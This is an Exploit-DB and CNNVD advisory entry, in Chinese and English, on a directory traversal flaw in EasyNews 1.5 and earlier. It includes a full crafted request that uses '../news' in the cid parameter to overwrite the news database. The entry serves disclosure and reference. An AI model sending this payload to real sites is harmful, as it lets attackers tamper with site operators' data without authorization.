https://www.exploit-db.com/exploits/21168
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-175

easyNews1.5版本及之前版本的注释行为中存在目录遍历漏洞。远程攻击者可以借助cid参数中的”..”修改news.dat、template.dat及可能其他文件。

source: http://www.securityfocus.com/bid/3643/info

EasyNews is a free, open-source script for displaying news stories on a website.

EasyNews is prone to a vulnerability which may allow a remote attacker to modify information in its Newsdatabase. As a result, a remote attacker may post unmoderated comments or possibly modify information in the templates used by EasyNews.

This may be exploited via a specially crafted web request.

Earlier versions may also be vulnerable.

http://[target]/index.php?action=comments&do=save&id=1&cid=../news&name=11/1
1/11&kommentar=%20&email=hax0r&zeit=you%20suck,11:11,../news,bugs@securityal
ert.com&datum=easynews%20exploited

来源:BID
名称:3643
链接:http://www.securityfocus.com/bid/3643
来源:XF
名称:easynews-php-modify-data(7657)
链接:http://www.iss.net/security_center/static/7657.php
来源:BUGTRAQ
名称:20011201easynews1.5let’sremoteusersmodifydatabase
链接:http://archives.neohapsis.com/archives/bugtraq/2001-12/0000.html